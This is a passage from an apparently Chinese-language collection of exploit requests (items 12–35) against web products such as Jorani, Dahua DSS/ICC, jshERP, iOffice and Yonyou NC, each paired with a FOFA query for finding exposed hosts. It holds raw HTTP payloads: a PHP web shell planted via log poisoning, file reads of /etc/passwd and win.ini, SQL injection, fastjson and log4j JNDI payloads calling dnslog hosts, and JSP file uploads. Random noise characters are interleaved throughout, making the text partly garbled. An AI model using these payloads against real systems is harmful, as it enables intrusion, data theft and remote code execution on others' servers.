' G6 G! g# h3 i% j4 q$ W# J9 ZHost: 127.0.0.16 F7 x0 u4 X2 y# p( ]
Pragma: no-cache, @6 m/ C% m' n# N3 T4 S- s- ^& @
Cache-Control: no-cache; S. s. U; l/ g5 ~7 Y5 E
Upgrade-Insecure-Requests: 1; H$ { }$ V* h- `. V
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.366 D. a) {0 J, r) u
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7: t* H' u" W/ Q7 s! u; s% N" Z$ Q
Accept-Encoding: gzip, deflate( R: v' w4 Y5 u: R
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8' l1 G) m; i7 q
Connection: close
9 `6 P3 D. w$ T
' T! s9 ~) K, Z& n* t6 p5 a* m, ]! M( J: k. i, Y0 \3 d
12. Jorani < 1.0.2 远程命令执行
7 G5 N& V2 {$ T- h/ B( JFOFA:title="Jorani"7 l+ E% O1 F K3 X- I) r6 a8 j
第一步先拿到cookie. a- q$ @' w! x$ v C
GET /session/login HTTP/1.1" [% \ }$ C. C
Host: 192.168.190.309 D, j. }+ `0 L0 E1 ?8 t& H
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36
. s9 [4 B3 I. @3 DConnection: close6 V& N0 P" v* d' U+ p/ s
Accept-Encoding: gzip
3 N, R9 l5 C3 \ n2 [( Q; K( q: O$ b7 B& x f+ e$ A2 n
/ ~: _% y8 \- B3 q( B1 x
响应中csrf_cookie_jorani用于后续请求
; K% |& Y- D' R0 Z" g4 q2 ^& w5 ?HTTP/1.1 200 OK
, |0 K! n7 ^+ A/ ?) L& fConnection: close
5 S7 G4 D E/ FCache-Control: no-store, no-cache, must-revalidate( n* ^4 R& T, }0 |
Content-Type: text/html; charset=UTF-85 f0 y! \5 G3 ^% i
Date: Tue, 24 Oct 2023 09:34:28 GMT. A" f- b2 b! ^/ v- E U
Expires: Thu, 19 Nov 1981 08:52:00 GMT/ n' a: s4 U/ I, _6 Q+ R
Last-Modified: Tue, 24 Oct 2023 09:34:28 GMT0 m' I4 A# m# B; J9 w
Pragma: no-cache
3 |. W, ~6 V+ \' LServer: Apache/2.4.54 (Debian); q% c; s: I* y- B. k! x
Set-Cookie: csrf_cookie_jorani=6ca560f2b0baf3cda87c818a4a15dc77; expires=Tue, 24-Oct-2023 11:34:28 GMT; Max-Age=7200; path=/2 q0 ?6 g8 l3 y7 O# a
Set-Cookie: jorani_session=bqk0ttr6q2mg3tae6rd75ei02umkq99r; expires=Tue, 24-Oct-2023 11:34:28 GMT; Max-Age=7200; path=/; HttpOnly
1 Q( i9 x; I! h3 a4 Y1 L" WVary: Accept-Encoding$ M. d3 k# R/ a
2 d$ X, g# u. h: a
5 q1 D3 A7 W+ u3 t% c
POST请求,执行函数并进行base64编码: h: u6 A. `. w- Y8 k8 C
POST /session/login HTTP/1.1
9 k0 m' u& {: @$ D qHost: 192.168.190.30
/ F/ q8 ^( I* x. n" xUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36
8 |1 ^% X/ q R+ I4 L3 m+ E& \Connection: close
/ a/ R! a' ?, v S: c3 Z) _Content-Length: 252
% M/ ]% e; q2 e' zContent-Type: application/x-www-form-urlencoded9 {, N* J/ d8 {& u8 W/ ?5 ~: f
Cookie: csrf_cookie_jorani=6ca560f2b0baf3cda87c818a4a15dc77; jorani_session=bqk0ttr6q2mg3tae6rd75ei02umkq99r, i% d$ ?8 x/ N. F
Accept-Encoding: gzip& @1 w9 I4 l8 t; [2 ]
; {/ S$ i6 _9 l3 J# Fcsrf_test_jorani=6ca560f2b0baf3cda87c818a4a15dc77&last_page=session%2Flogin&language=..%2F..%2Fapplication%2Flogs&login=<?php if(isset($_SERVER['HTTP_K1SYJPMHLU4Z'])){system(base64_decode($_SERVER['HTTP_K1SYJPMHLU4Z']));} ?>&CipheredValue=DummyPasswor
" ?- M# B) F" |! w' L& E9 }+ ], B8 T) `
; M9 _2 Q; Z' G) X3 r/ Z0 t; i O9 \
2 ?0 @- K0 f& C$ x7 A* Z. I向靶场发送如下请求,执行id命令,请求头中的ZWNobyAtLS0tLS0tLS07aWQgMj4mMTtlY2hvIC0tLS0tLS0tLTs=是命令base64编码后的字符串
6 M2 q, Q6 V' {6 ]GET /pages/view/log-2023-10-24 HTTP/1.1. L1 N7 k* P" {
Host: 192.168.190.30
( C; F' f; R. g. w' ?9 K: aUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
1 v: L( r0 T7 n: `Connection: close, M& G& A3 T4 D6 i
Cookie: csrf_cookie_jorani=6ca560f2b0baf3cda87c818a4a15dc77; jorani_session=bqk0ttr6q2mg3tae6rd75ei02umkq99r0 y' P# F" U5 {% s" s
K1SYJPMHLU4Z: ZWNobyAtLS0tLS0tLS07aWQgMj4mMTtlY2hvIC0tLS0tLS0tLTs=) }$ @& A6 Y$ _5 K T% `+ r
X-REQUESTED-WITH: XMLHttpRequest
9 n* Q7 V% @( Q2 g. M8 pAccept-Encoding: gzip
0 ~* O4 L# Y' v
$ n `& Q0 A* F3 K3 N2 u; m, P' s+ I" v7 g. ]. o% Y- G
13. 红帆iOffice ioFileDown任意文件读取" @) @" i" t4 X; t8 \5 V, b6 E
FOFA:app="红帆-ioffice"7 h* X/ r% v; @
GET /ioffice/prg/interface/ioFileDown.aspx?sFilePath=c:/windows/win.ini HTTP/1.1
% s L( f( U, h2 K* NHost: x.x.x.x# O$ d( X' X; z0 C/ X6 J v0 V
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
% @2 ]! p: P. m& K$ vConnection: close1 t+ i7 R( U9 g5 n
Accept: */*
+ ?+ S0 {2 W2 b. {Accept-Encoding: gzip
( F1 X; W% |/ p5 t5 D
( {& k% S; s( N5 H2 F3 P0 o( `' |& {, u2 l% J! P
14. 华夏ERP(jshERP)敏感信息泄露
( C9 s* P9 T- ]1 IFOFA:body="jshERP-boot"
- {8 `: T' p1 O' H# W# A& A" p泄露内容包括用户名密码3 v4 F. E" ~8 Q+ E
GET /jshERP-boot/user/getAllList;.ico HTTP/1.1
* h# q8 h) y1 s: e5 u& h4 lHost: x.x.x.x
( X$ }8 E+ g. a: C( DUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36" e/ T6 h5 n6 O4 J
Connection: close( x6 U% X' B( ^$ |1 n, P- d
Accept: */*
* X! |4 c' M$ h) X" s/ E# T! X; dAccept-Language: en
0 i5 Y& m( z. z) K' t3 K6 {Accept-Encoding: gzip+ f" q! q! b6 p) c
, g( u+ L! V5 y
* k. B) N6 l2 h15. 华夏ERP getAllList信息泄露 j. I: r) U# V, {( X5 I8 c
CVE-2024-0490
, {+ [% u7 b' b1 H4 M' _FOFA:body="jshERP-boot"
6 c0 K( h" v9 Q0 N泄露内容包括用户名密码
6 ]% D B- U& P0 m+ u# b& [GET /jshERP-boot/user/a.ico/../getAllList HTTP/1.1
o6 m5 L3 v; q- Q: Q6 OHost: 192.168.40.130:100
( @$ |+ U: k/ qUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36
: | _/ F ?; T) Z. \7 [Connection: close/ q3 O4 ?4 T7 Z, f( @
Accept: application/signed-exchange;v=b3;q=0.7,*/*;q=0.8
0 c" } \6 t, h! H$ sAccept-Language: en
3 @2 k* P; Y* U8 H+ N W1 {. isec-ch-ua-platform: Windows
! f1 p# n- {0 c0 b7 VAccept-Encoding: gzip
! B* W6 G2 E8 z; F ^, I. X9 y: G3 l- Q, o' x3 M* e/ _
* `( g `5 x9 ?16. 红帆HFOffice医微云SQL注入
' Z9 {3 s4 m) S3 T3 ZFOFA:title="HFOffice"
! V& N# @4 G$ l% r8 d9 zpoc中调用函数计算1234的md5值
0 \. |# d$ ^, k& e' yGET /api/switch-value/list?sorts=%5B%7B%22Field%22:%221-CONVERT(VARCHAR(32),%20HASHBYTES(%27MD5%27,%20%271234%27),%202);%22%7D%5D&conditions=%5B%5D&_ZQA_ID=4dc296c6c69905a7 HTTP/1.1
. o) n3 Z- U( e# hHost: x.x.x.x
* Z; u6 E# p: ~( }) `6 vUser-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36
, {( B8 ~; j9 NConnection: close
, K' l/ D6 h, y% j0 Q- D$ |Accept: */*3 l5 b; Y3 l: c$ M5 o; z# L
Accept-Language: en
9 c [' D" |& i6 S3 u2 m, P* C. w1 wAccept-Encoding: gzip+ N0 w' a$ R- L5 k
/ @+ |! M; D+ {8 ]3 {& j# G
* C |! N9 N9 B, h6 h, a, V17. 大华 DSS itcBulletin SQL 注入* `- [! w3 g$ X5 p5 C
FOFA:app="dahua-DSS"
/ S0 F' `$ c/ S( p# NPOST /portal/services/itcBulletin?wsdl HTTP/1.1
2 n1 f. K0 L* M( AHost: x.x.x.x! u( u$ s \8 Q/ b, v5 {
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
3 K( x, f. w9 S/ v3 sConnection: close
" g% n) L6 D% [% lContent-Length: 345
6 @; W2 p, A7 w" _1 PAccept-Encoding: gzip
& g1 D3 \/ R7 A! p ^; P# b* E; J
+ v7 k: R# v3 O( A$ Y4 p<s11:Envelope xmlns:s11='http://schemas.xmlsoap.org/soap/envelope/'>
) N! J3 B7 N$ f1 L* C<s11:Body>
3 y T0 L9 m' D# i) F O <ns1:deleteBulletin xmlns:ns1='http://itcbulletinservice.webservice.dssc.dahua.com'>( U4 j# m2 g; \2 }/ Z1 u' f
<netMarkings>4 i9 p9 _4 X0 i2 g1 Y
(updatexml(1,concat(0x7e,md5(102103122),0x7e),1))) and (1=1+ j( e1 H3 ~+ Y5 {3 x3 i7 c# [! t
</netMarkings>
" f0 |" X6 R9 ?& g8 I4 m </ns1:deleteBulletin>
) Y: A0 M4 h( ]' H* l- m </s11:Body>! p4 s* O3 u* L6 s5 e9 ]4 C
</s11:Envelope>
3 w% Z" l8 |" x
; a: }+ o s, J
; \9 ~) @5 D% M# r4 \1 h18. 大华 DSS 数字监控系统 user_edit.action 信息泄露
/ x4 e2 @$ H; u9 AFOFA:app="dahua-DSS"
5 M" ~: v( l3 p4 nGET /admin/cascade_/user_edit.action?id=1 HTTP/1.1$ S) j7 M0 b, Q9 E$ M1 x+ r8 g
Host: your-ip
9 v) D( x/ h# Y& q- y5 s/ CUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
( l0 J% E! M# `- ^* }/ s, OAccept-Encoding: gzip, deflate; n9 @8 N# X; Z2 M
Accept: */*
, E3 n& p* I: F' Z4 z6 s- C4 TConnection: keep-alive
- p4 @ ?% P' \6 A5 L& \6 P m; i7 r3 a8 }( j6 W! y
- G+ E( b- c" K; u7 [" ^
8 j* P! ~$ k" j19. 大华 DSS 数字监控系统 attachment_clearTempFile.action SQL注入
4 D( E( Z# ~2 ?5 `FOFA:app="dahua-DSS"
$ w7 S, A+ y+ q8 @. ]& _* L/ x+ FGET /portal/attachment_clearTempFile.action?bean.RecId=1%27)%20AND%20EXTRACTVALUE(8841,CONCAT(0x7e,user(),0x7e))%20AND%20(%27mYhO%27=%27mYhO&bean.TabName=1 HTTP/1.11 _ W0 p3 W* D A
Host: T6 Y J- k6 L4 [; D5 U, x" ?
User-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
& o! t/ H" N* P; y6 f- I& D, Z( f b! ZAccept-Encoding: gzip, deflate9 g R9 q+ @# c( m: Y" N
Accept: */*
6 P$ o# S @9 R0 Y/ YConnection: keep-alive
6 \, c7 ?4 |8 }! r$ @
) R; v5 t } F
$ i. A q) H. \9 y! Z20. 大华ICC智能物联综合管理平台任意文件读取
: a8 q7 a+ ~5 G8 L2 K* B6 RFOFA:body="*客户端会小于800*"
" |, e) U/ {5 J/ w* W3 H3 RGET /evo-apigw/evo-cirs/file/readPic?fileUrl=file:/etc/passwd HTTP/1.1
. d0 O5 Q8 W. W# X5 |) D/ LHost: x.x.x.x& [; _" r* V+ h) h, V2 Y
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.363 n- B+ W7 ~2 O+ _
Connection: close$ ~! w8 u6 P. X4 C; K$ |
Accept: */*. P. s. u. ?, N1 K" j
Accept-Language: en
8 _2 g9 y0 h( [6 a6 w* lAccept-Encoding: gzip
; w- e8 ] b! ?! C
. g' a4 `- {+ t* ~% l* w2 o8 k5 ^- P: _
21. 大华ICC智能物联综合管理平台random远程代码执行& F- C, d, U2 R8 J. [$ O
FOFA:icon_hash="-1935899595"
( X0 B( Y* {' k; b- H8 YPOST /evo-runs/v1.0/auths/sysusers/random HTTP/1.1
7 H& V$ ~7 l" }7 hHost: x.x.x.x
# s t3 v. S7 c" T6 cUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15 R' _6 J* v) r
Content-Length: 161
@' M( {: {* O7 o6 [" ?2 q- }Accept-Encoding: gzip3 G" L q+ H2 S# B
Connection: close
" |1 b0 b C5 kContent-Type: application/json;charset=utf-8
1 v0 ?6 b( a8 O2 u z2 Q* n- _' [7 j9 H( @$ c6 T
{
0 f& f2 S/ c0 f. J: I% p4 N"a":{
+ e$ T+ S/ k# D9 L' B- e$ [& j "@type":"com.alibaba.fastjson.JSONObject",
9 L" B- p: x9 d7 g1 v9 F$ ` {"@type":"java.net.URL","val":"http://farr9frh.dnslog.pw"}4 b( f" t6 A" i. x# o; {) c, p
}""
3 W( N& N- p3 S9 ?- C' ]}
( X8 G/ \' R7 `/ A/ O! k. o) N& b% g5 e& n" f% S
1 f8 E7 E, g: \5 [* m22. 大华ICC智能物联综合管理平台 log4j远程代码执行1 P# s, {4 X5 [/ I9 \7 k4 j- _
FOFA:icon_hash="-1935899595"- ?5 z3 t" R0 i }
POST /evo-apigw/evo-brm/1.2.0/user/is-exist HTTP/1.1# j u& z, a o4 H
Host: your-ip
" D4 |- ^$ M7 O/ wUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36: I0 t0 D* a; ^7 F# n
Content-Type: application/json;charset=utf-8" e7 h; T/ h# t+ i& B
. i7 n1 B, B. `9 Q6 J6 z
{3 D3 i6 w) H3 @, X6 j' W: w' j, z
"loginName":"${jndi:ldap://dnslog}"- }. d8 n* c4 H) S v
}
3 p* {( ]( U) S, A3 U" v- \- Y8 x1 ? b3 h% e0 R4 v/ a, m1 V
; F# Q# o: p, i: l
3 S- Q4 u8 `& Y, O* i$ j$ j) L8 ~23. 大华ICC智能物联综合管理平台 fastjson远程代码执行% b4 Y, L$ Q: k! f/ Z3 k5 A4 }
FOFA:icon_hash="-1935899595"
$ `6 z7 ?7 {% `POST /evo-runs/v1.0/auths/sysusers/random HTTP/1.19 f- T" r! L* R6 y
Host: your-ip7 S0 d) v- A3 b5 T# B6 Z" F" w
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
8 q! g5 B8 E& ^1 L7 QContent-Type: application/json;charset=utf-8
0 I! v' X! B( k* @2 bAccept-Encoding: gzip) y$ s# Z( `. I/ [" {0 i, u) ]
Connection: close: P: N) E. j, O3 ~! Y3 F" e
3 D/ o) o6 o9 n: R) Y1 e# B; j
{3 G. ~# t/ U& y- p1 O
"a":{0 n$ a; g5 G+ h0 z0 W' y
"@type":"com.alibaba.fastjson.JSONObject",8 o! |! ^& x4 W4 {1 \! T3 `( Y
{"@type":"java.net.URL","val":"http://DNSLOG"}
& n6 w6 i7 l. w* o4 _4 Q. a" E }""6 C% J0 o8 \6 Q5 _1 ?0 t( c0 @$ ]
}; X1 P; k2 y' J# ~8 R: h& U6 _
9 a. i( a: T5 H# I' g- E3 K, n) D) h g$ e
24. 用友NC 6.5 accept.jsp任意文件上传) c" T$ {% u1 J1 J6 z+ R" c
FOFA:icon_hash="1085941792"$ H% y3 l! z! g2 I. e! g! r: u9 B
POST /aim/equipmap/accept.jsp HTTP/1.1. {( P1 S5 ^- i. {/ @( ]0 o- @
Host: x.x.x.x; g4 \* s" Z9 r$ m& L
User-Agent: Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36) S6 _+ W8 X# _# s
Connection: close
/ r' f( v5 b! R! X; l( oContent-Length: 449
1 X* e3 A0 M% s6 S8 OAccept: */*3 u+ t4 A) a; }$ T
Accept-Encoding: gzip) `# _0 n& [1 }+ P. u. b/ f
Content-Type: multipart/form-data; boundary=---------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc
0 i6 ?( s# ]; |4 Y* m! Y( s
2 m) i7 d! P9 K) f9 X, T-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc
, ~6 h& B$ g1 h6 r6 D: ZContent-Disposition: form-data; name="upload"; filename="2XpU7VbkFeTFZZLbSMlVZwJyOxz.txt"3 a1 {7 n' l0 \3 f8 e: J3 z
Content-Type: text/plain
5 U6 M% W: X: `- E* f
|7 q d8 [$ x# C2 a<% out.println("2XpU7Y2Els1K9wZvOlSmrgolNci"); %>1 s2 W# d( P$ \4 Q5 u
-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc* h4 s. [! H: a! U+ S* E2 Y
Content-Disposition: form-data; name="fname"
; S' e. w! M' v8 T! a
: z# R. n6 _% g\webapps\nc_web\2XpU7WZCxP3YJqVaC0EjlHM5oAt.jsp& `7 c: A! @1 w/ A6 n
-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc--* W: E7 O$ V) ]# z2 T
+ f" R! V+ N' K% g4 V3 ~9 P
6 l: B3 X( ]* c7 k2 j, ~# C* v- P25. 用友NC registerServlet JNDI 远程代码执行/ q4 _; J N" c
FOFA:app="用友-UFIDA-NC"
5 d5 g" l( f% u/ W, ?3 f. `8 ZPOST /portal/registerServlet HTTP/1.1) g) i& _5 G" a
Host: your-ip
0 P; [0 U9 D6 x( ^: l4 jUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0
, @$ ^, v* d# h; {' lAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*; q=0.8,application/signed-exchange;v=b3;q=0.9
9 A" m' H ]7 J3 Q3 qAccept-Encoding: gzip, deflate. o- |& C+ o: c# A" R _/ k
Accept-Language: zh,en-US;q=0.9,en-GB;q=0.8,en;q=0.7,zh-CN;q=0.6
! u+ c7 |" G* R% Q& ]& ]Content-Type: application/x-www-form-urlencoded
! a2 Q/ E4 C$ Q. h! z. a
' F* z9 [% ^, L5 v9 Utype=1&dsname=ldap://dnslog
" v" a: i1 k* a- P: e f$ B3 Y9 _2 M: V2 e0 b% r) Q% L% D( t6 A/ n
- W! H9 D* ^; \
+ A4 U5 X3 T0 E# C6 [8 m' c26. 用友NC linkVoucher SQL注入3 H% ^4 v* N% ^5 Y2 g+ j
FOFA:app="用友-UFIDA-NC"- N! u9 Y- o) v1 X2 }! w& H6 {
GET /portal/pt/yercommon/linkVoucher?pageId=login&pkBill=1'waitfor+delay+'0:0:5'-- HTTP/1.12 P6 M3 p7 Z5 f8 l) a
Host: your-ip9 l' E; x q" G& L/ x! S
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
. a! `) d* B& Z/ t6 gContent-Type: application/x-www-form-urlencoded7 l& j, J) H$ @ ~# V6 p }# }
Accept-Encoding: gzip, deflate
/ M+ x& a/ M% g; o( s, @$ a; D% FAccept: */*
: O7 R5 N4 @ K0 {( ]Connection: keep-alive9 Q+ K* [& S& u0 \$ Q4 t) q
! C9 M) a8 R; D, V( D- B8 v, [
27. 用友 NC showcontent SQL注入7 t2 F3 I+ f8 K" k" t6 z, K
FOFA:icon_hash="1085941792"
. d+ p9 h" X) z* ]; _2 |- RGET /ebvp/infopub/showcontent?id=1'+AND+1=DBMS_PIPE.RECEIVE_MESSAGE(1,5)-- HTTP/1.10 [- i, o& F) k" k% m* B1 u1 M! o
Host: your-ip' L" t4 R" y) G& k" |& Z& J
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
0 Y: g' l2 D5 `0 H. e ?Accept-Encoding: identity
- D% _" o$ p( SConnection: close
2 _# U% \5 ]* _Content-Type: text/xml; charset=utf-8% v/ M, N4 H# r) T' f
, l+ Q* c: e) ^! f
- z7 ~7 k: R3 L( h6 o, M28. 用友NC grouptemplet 任意文件上传7 |) X4 }7 F+ |1 T" r* Q
FOFA:icon_hash="1085941792"
# T3 d. K& n, J' p) P$ T( T6 WPOST /uapim/upload/grouptemplet?groupid=nc&fileType=jsp HTTP/1.1% |4 W* R" E/ q* w8 c `4 O0 S* r
Host: x.x.x.x
) E3 G1 x" U* A- t* p! NUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36; r7 j' [* T7 c1 H
Connection: close/ Q* q$ t6 q3 X4 L" v4 Y8 s2 Z
Content-Length: 268
# v# u4 Z) k! @, j" x; C/ j7 y- G0 rContent-type: multipart/form-data; boundary=----------ny4hGVLLpZPZm0CE3KNtyhNSXvFgk
! ], y- y2 ]7 }# @6 C' a, h# a: _+ wAccept-Encoding: gzip; \+ n- w8 `* K0 V1 Y
: [ y! D) M6 Q! r& q9 T------------ny4hGVLLpZPZm0CE3KNtyhNSXvFgk
4 _4 O5 f6 T6 iContent-Disposition: form-data; name="upload"; filename="2fiu0YTGkaX2DrJlUZZP5IGvNvk.jsp"
7 z5 c& @, ~1 {. L' VContent-Type: application/octet-stream2 a* X1 b% J) R& z1 h# F, Q5 B
+ ~8 j) @9 F$ Y
<%out.println("2fiu0WM4788fa6NcMHipkIthTTW");%>5 l- R+ o7 u a( }) y* w
------------ny4hGVLLpZPZm0CE3KNtyhNSXvFgk--* w4 q% N7 H) i1 @
0 v% x/ }, Q0 c3 x! D* ^3 w. S
6 ~: `( }% P. G$ o3 q, `/uapim/static/pages/nc/head.jsp0 Z' r5 A8 |4 i
8 p7 W, K1 U: f9 t' [, g$ F+ L9 ?29. 用友NC down/bill SQL注入
3 @ k% C! D0 r" EFOFA:icon_hash="1085941792" && body="/logo/images/logo.gif"
0 ]+ S" B( e: v3 x: zGET /portal/pt/erfile/down/bill?pageId=login&id=1'+AND+4563=DBMS_PIPE.RECEIVE_MESSAGE(CHR(65),5)-- HTTP/1.1
8 P1 o: n9 C; X# d3 BHost: your-ip
5 J% W: I, M$ s9 T- d. @1 ?' |, ^User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
& I5 _7 w8 D% N6 F" R8 g S3 T2 p) N CContent-Type: application/x-www-form-urlencoded) ]# ]' _# I3 F2 c2 z2 }
Accept-Encoding: gzip, deflate: y' W' l8 G6 S0 Q0 v3 u H
Accept: */*& ~, `# P m( ~; j. K8 {: l
Connection: keep-alive
% g0 c1 W4 A! J6 A2 W( n* T) m3 P; w8 h, K9 _
2 r& z$ I$ s1 s4 s
30. 用友NC importPml SQL注入. i. {( T f: y P
FOFA:icon_hash="1085941792" && body="/logo/images/logo.gif"
8 U7 E m: `# _7 X, P/ r2 u5 nPOST /portal/pt/portalpage/importPml?pageId=login&billitem=1'WAITFOR+DELAY+'0:0:5'-- HTTP/1.1
1 W" i, @. n& X. o# V2 QHost: your-ip
9 @- q% X! z' I1 I, [2 v6 \Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryH970hbttBhoCyj9V. O6 V$ S! u) s$ c9 b
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.361 H5 T6 H# f0 W7 _6 R5 H6 L) ^
Connection: close
* _1 A0 Y6 g& n& o* B
4 T( H* L! D, B# ?& T$ }! |------WebKitFormBoundaryH970hbttBhoCyj9V
8 |/ Y3 M0 A1 K( X% JContent-Disposition: form-data; name="Filedata"; filename="1.jpg"
- n" j5 y7 d$ H3 a1 N& t# ]# d& u6 IContent-Type: image/jpeg3 G. Z7 Y5 ?( r
------WebKitFormBoundaryH970hbttBhoCyj9V--# A) @' T4 ]( f4 N* y2 D
6 i7 \0 h- T* |5 v+ H
* g& Z7 T. Y) r) m( W/ b
31. 用友NC runStateServlet SQL注入
) U" L3 n( [* i8 E; tversion<=6.5* w) \: @1 K- P4 s4 e- c6 a
FOFA:icon_hash="1085941792" && body="/logo/images/logo.gif"
1 I2 B( j+ @# _5 m% z8 d+ G+ m' x6 _7 NGET /portal/pt/servlet/runStateServlet/doPost?pageId=login&proDefPk=1'waitfor+delay+'0:0:5'-- HTTP/1.1! s9 t9 o T1 U* K1 b7 M- e7 n
Host: host
8 @: j. _* K3 u& AUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
3 q; ?: I1 `, y. u$ I, XContent-Type: application/x-www-form-urlencoded
6 Q1 ^+ x+ T0 m; Y0 K
# d6 g& F: s3 l5 G) ? v
& |+ J# v* Y1 g$ D; q32. 用友NC complainbilldetail SQL注入
# S% j" b0 v& A6 K, a% N, J+ vversion= NC633、NC65
# y6 w' H3 I2 q% X' `% k+ D* LFOFA:app="用友-UFIDA-NC"5 K% Y$ |& m2 T9 d3 F; t' L
GET /ebvp/advorappcoll/complainbilldetail?pageId=login&pk_complaint=1'waitfor+delay+'0:0:5'-- HTTP/1.1
) G/ k: L+ \; V* `6 E* V. B% LHost: your-ip
- T) P5 ?4 B# UUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
, X6 y; X7 K. HContent-Type: application/x-www-form-urlencoded2 r9 q/ J6 @9 ~- ]1 ~0 y6 H0 _/ V/ h' `
Accept-Encoding: gzip, deflate6 ~* N* c0 F/ h# `1 H. g
Accept: */*
; K x: p4 y7 z5 N$ A5 T, V0 RConnection: keep-alive
: N/ n( ~. b; r
' Q. n1 C" c g# p2 y0 L. q
( h% A, n7 I5 v3 j+ m7 W33. 用友NC downTax/download SQL注入$ p% v. m/ ^* Y* ^
version:NC6.5FOFA:app="用友-UFIDA-NC", d5 E( I" o0 }
GET /portal/pt/downTax/download?pageId=login&classid=1'waitfor+delay+'0:0:5'-- HTTP/1.1( b. H! Y4 g. B' p8 ?9 n
Host: your-ip
+ o9 ?9 } W3 ~& J2 @9 ]User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.368 v% X/ Z1 D! {! N' `/ J- f' l
Content-Type: application/x-www-form-urlencoded
0 n. q. H1 S- |4 TAccept-Encoding: gzip, deflate
2 o. }' q, r" @ ~+ A$ ZAccept: */*# p4 X5 i3 W) {* O/ X, w& e
Connection: keep-alive
, U* ]( Q5 M& l% i
" i% v) f6 X6 |+ D* u
4 p% |# H3 k/ T' u6 Q) Y34. 用友NC warningDetailInfo接口SQL注入
+ ?1 }/ g; x% j' ?& S0 k8 ~FOFA:app="用友-UFIDA-NC"
1 z6 v L' u1 ^! Y7 \- b1 }/ jGET /ebvp/infopub/warningDetailInfo?pageId=login&pkMessage=1'waitfor+delay+'0:0:5'-- HTTP/1.16 D. u: W- ]4 ]% G
Host: your-ip' j/ n$ a+ p, G* z8 f# j7 D% b
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
4 d) O2 p2 G8 U- j" h/ e' wContent-Type: application/x-www-form-urlencoded8 X5 E0 ~/ s$ j4 G
Accept-Encoding: gzip, deflate
( R0 J) }& R% G) z c$ A T1 l% e! {Accept: */*
0 n& e$ S! }( V# R6 Y5 dConnection: keep-alive
* i3 O$ o; \3 y I* x9 I9 p! l3 R4 F) _* C( _0 C* i
( z7 ~* k; b9 E; A7 O5 k+ M35. 用友NC-Cloud importhttpscer任意文件上传
+ L) X; f9 c/ {, D/ B0 qFOFA:app="用友-NC-Cloud"
